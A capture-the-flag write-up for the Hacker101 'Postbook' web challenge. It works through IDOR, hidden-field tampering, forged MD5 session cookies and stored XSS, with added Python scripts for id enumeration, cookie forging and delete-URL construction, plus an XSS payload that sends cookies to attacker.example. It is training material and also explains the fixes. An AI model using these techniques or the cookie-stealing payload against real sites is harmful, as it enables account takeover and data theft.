Hacker101 CTF - Postbook

Your secrets are safe with us

Flag 0

User is to user as Password is to...

Flag 1

The view page takes the post id straight from the query string and never checks that the post belongs to the logged-in user, so simply navigating to a URL for a post by id is enough: http://{ctf}/83e2a28450/index.php?page=view.php&id=2

easy peasy

Flag 2

There is a hidden field on the form for creating a new post, and the server trusts it. Go ahead and set it to another user's index and you post as someone else!

<input name="user_id" value="2" type="hidden">

Flag 3

I had to use a hint on this one. The hint is simply 189 * 5. Well, that's 945, what's the significance of that? I tried a bunch of things and then tried http://{ctf}/5bc75e8e8a/index.php?page=view.php&id=945. Ok, that's a flag. Probably could have used some tools to try all the ids from 0 to a bazillion.
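As an added example (not part of the original write-up), here is the enumeration the author mentions, in Python: walk a range of integer ids against the view page and keep the ones that come back as a real post. The base URL, the "Post not found" text used to recognise an empty page, and the FAKE_SITE responses are all constructed assumptions; on the live challenge, look at one missing-id response first and set NOT_FOUND_MARKER to whatever it actually says.

```python
from urllib.parse import urlparse, parse_qs
from urllib.request import Request, urlopen

# Assumed: text the challenge returns for an id that does not exist.
NOT_FOUND_MARKER = "Post not found"


def post_url(base, post_id):
    """Build the view URL for a numeric post id (same shape as the write-up's URLs)."""
    return f"{base}/index.php?page=view.php&id={post_id}"


def http_fetch(url, cookie=None, timeout=5):
    """Fetch a page with an optional session cookie; None on any network error."""
    req = Request(url)
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return None


def enumerate_posts(base, ids, fetch=http_fetch, marker=NOT_FOUND_MARKER):
    """Return {id: body} for every id whose page is not the not-found page.

    `fetch` is injectable so the logic can be exercised offline; against the
    live challenge pass http_fetch (or a functools.partial carrying your cookie).
    """
    found = {}
    for post_id in ids:
        body = fetch(post_url(base, post_id))
        if body is None or marker in body:
            continue
        found[post_id] = body
    return found


# Constructed stand-in for the challenge so the example runs offline.
FAKE_SITE = {
    1: "<h1>Hello world</h1><p>first post</p>",
    2: "<h1>private post</h1><p>only for me</p>",
    945: "<h1>hidden post</h1><p>the flag would be here</p>",
}


def fake_fetch(url):
    """Answer like the view page would, using FAKE_SITE instead of the network."""
    post_id = int(parse_qs(urlparse(url).query)["id"][0])
    return FAKE_SITE.get(post_id, f"<p>{NOT_FOUND_MARKER}</p>")


if __name__ == "__main__":
    hits = enumerate_posts("http://ctf/83e2a28450", range(0, 1000), fetch=fake_fetch)
    for post_id, body in sorted(hits.items()):
        print(post_id, body)
```

Against a real target, add a small delay between requests and a stop condition (for example, N consecutive misses) rather than literally walking to a bazillion; sequential integer ids with no ownership check are the textbook IDOR, and the fix is to check ownership server-side, not to make the ids harder to guess.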

Flag 4

Well, if you can read a post using any valid URL, can you also edit a post? http://{ctf}/83e2a28450/index.php?page=edit.php&id=2 Yup, the edit page has the same missing ownership check, so you can now edit the "private" post. Throw some of your own text in there and upon submitting you've captured #4.

Flag 5

Cookies are stable across sessions, i.e. if you sign out and sign back in, you get the same cookie as the first time, so it can't be a random session token. Aha! The cookie is just the MD5 hash of the user's index:

(md5 "3")
"eccbc87e4b5ce2fe28308fd9f2a7baf3"

Substitute the hash of another index and you have a session cookie for another user, no password needed!

(md5 "1")
"c4ca4238a0b923820dcc509a6f75849b"

Flag 6

Wrong idea

Well, it looks like there is rudimentary validation of the username at account creation, but it is performed client side only, and once the account exists you can change the username and no validation occurs at all. That means your username can be JavaScript, and it will execute whenever someone visits a page that renders your posts with your username as the Author.

That works: I am able to perform alerts, and even read and output cookies with document.cookie, because the cookie is not marked HttpOnly.
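The rendering bug behind that stored XSS, as an added Python illustration (not the challenge's own code, which is PHP): the author name is dropped into the HTML unescaped, and the only name check lives in the browser. The hardened version escapes on output and repeats the check on the server, on the rename form as well as on sign-up. The username policy (letters, digits, underscore, 1 to 32 characters) and the attacker URL in the constructed payload are assumptions.

```python
import html
import re

# Assumed server-side policy; the challenge only validates in the browser.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def render_author_unsafe(username):
    """What the challenge effectively does: the stored name goes into HTML as-is."""
    return f'<span class="author">{username}</span>'


def render_author_safe(username):
    """Escape on output so a name that contains markup is displayed, not executed."""
    return f'<span class="author">{html.escape(username, quote=True)}</span>'


def is_valid_username(username):
    """Server-side check that must run on every path that sets the name."""
    return USERNAME_RE.fullmatch(username) is not None


# Constructed payload: a renamed account that exfiltrates the viewer's cookie.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    print(render_author_unsafe(PAYLOAD))
    print(render_author_safe(PAYLOAD))
    print(is_valid_username(PAYLOAD), is_valid_username("alice_2"))
```

Output escaping is the control that actually stops the script from running; the server-side username check is defence in depth, and marking the session cookie HttpOnly would at least keep document.cookie out of reach even if the escaping were missed somewhere.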

After hint

Had to use another hint; looks like I was barking up the wrong tree. The hint suggests we can mess with deleting posts if we can figure out what the id parameter is derived from.

After giving up for the night, I returned today and fired up a new instance of the challenge. I had recorded the URLs from last night and lo and behold, my first post today had the same id as the first post yesterday! Same for second, third, etc. posts. That's got to mean something useful, right?

Oh, duh, the id parameter is the MD5 hash of the post index, hashed as a decimal string, exactly like the session cookie:

(md5 "3")
"eccbc87e4b5ce2fe28308fd9f2a7baf3"

The delete action only checks that you are logged in, not that you own the post, so you can delete anyone's posts by computing their id and using your own logged-in session cookie!
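Flags 5 and 6 rest on the same defect: both the session cookie and the post id are the MD5 of a small integer, so both are trivially forged and trivially reversed. The following Python is an added example, not code from the write-up. The cookie name `id` and the page name `delete.php` are assumptions (the write-up names neither); the index-to-hash mapping is exactly what the write-up shows.

```python
import hashlib


def md5_of_index(index):
    """The challenge's identifier scheme: MD5 of the decimal index as a string."""
    return hashlib.md5(str(index).encode("ascii")).hexdigest()


def forge_session_cookie(user_index, cookie_name="id"):
    """Cookie header value that logs you in as any user (cookie name is assumed)."""
    return f"{cookie_name}={md5_of_index(user_index)}"


def predict_post_ids(first_index, count):
    """Ids a fresh instance will hand out for its next `count` posts."""
    return {i: md5_of_index(i) for i in range(first_index, first_index + count)}


def recover_index(digest, max_index=100_000):
    """Reverse a cookie or post id back to its index by brute force."""
    digest = digest.lower()
    for i in range(max_index + 1):
        if md5_of_index(i) == digest:
            return i
    return None


def delete_url(base, post_index):
    """Delete link for someone else's post (page name delete.php is assumed)."""
    return f"{base}/index.php?page=delete.php&id={md5_of_index(post_index)}"


if __name__ == "__main__":
    print(forge_session_cookie(1))
    print(recover_index("eccbc87e4b5ce2fe28308fd9f2a7baf3"))
    print(delete_url("http://ctf/83e2a28450", 2))
```

Hashing the index buys nothing: a hash of a predictable value is itself predictable, and the brute-force reversal above runs in well under a second for any realistic index. Session tokens need to come from a CSPRNG and be stored server-side, and the delete, edit and view handlers all need to check that the post belongs to the session's user.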

COMPLETE